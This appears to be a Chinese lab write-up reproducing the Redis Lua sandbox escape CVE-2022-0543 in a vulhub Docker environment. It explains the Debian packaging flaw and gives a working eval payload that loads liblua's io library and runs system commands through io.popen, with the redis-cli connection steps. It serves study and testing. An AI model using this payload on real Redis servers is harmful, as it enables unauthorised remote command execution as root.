【vulhub】redis CVE-2022-0543（redis沙盒逃逸）

渗透环境

攻击机：   IP: 192.168.66.130（Kali）

漏洞收录于：vulhub/redis/CVE-2022-0543

涉及知识点：redis沙盒逃逸

漏洞详情

受影响的系统：

• 仅限于 Debian 系 Linux 发行版（如 Debian、Ubuntu）及其衍生版本。
• 不受影响的系统：CentOS、RHEL 等非 Debian 系发行版不受此漏洞影响（漏洞源于 Debian 维护者在打包 Redis 时的补丁问题，而非 Redis 自身代码问题）。

受影响的 Redis 版本范围：

• redis版本小于等于6.x的都可以尝试。

触发条件：

​ 攻击者需具备 Redis 的未授权访问权限或合法凭证。

漏洞原理

1. 背景
   Redis 允许通过 eval 命令执行 Lua 脚本，但正常情况下这些脚本运行在沙箱中，无法执行系统命令或文件操作。

2. 补丁引入的漏洞
   Debian/Ubuntu 在打包 Redis 时，通过补丁代码向 Lua 沙箱中注入了一个名为 package 的全局对象。该对象本应在源码中被注释（出于沙箱安全考虑），但补丁错误地重新启用了它。

3. 沙盒逃逸过程

   • 加载动态库：攻击者可通过 package.loadlib 加载 Lua 系统库（如 liblua5.1.so.0），调用其导出函数（如 luaopen_io）获取 io 库权限。
   • 执行命令：利用 io.popen 等函数执行任意系统命令。

   local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
   local io = io_l();
   local f = io.popen("whoami", "r");  -- 执行系统命令
   local res = f:read("*a");
   f:close();
   return res;
   

攻击思路：

单从攻击角度而言，可以使用redis未授权相同的打法，博客见：【vulhub】redis 4-unacc （redis未授权访问） - Mr_Soap - 博客园

从漏洞角度来看，使用eval函数执行上面的逃逸过程即可。

复现漏洞

一、 启动漏洞容器

docker-compose up -d

可以看到redis运行在默认端口6379上

二、未授权连接

redis-cli -h 192.168.66.130

redis-cli -h [IP] -p [port] -a [password]

当使用默认端口6379时可不使用参数-p

测试连接，ping一下，成功连接

三、get shell

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");local io = io_l();local f = io.popen("whoami", "r");local res = f:read("*a");f:close();return res;' 0

可以看到命令都已经成功执行，我们已经拿到了root权限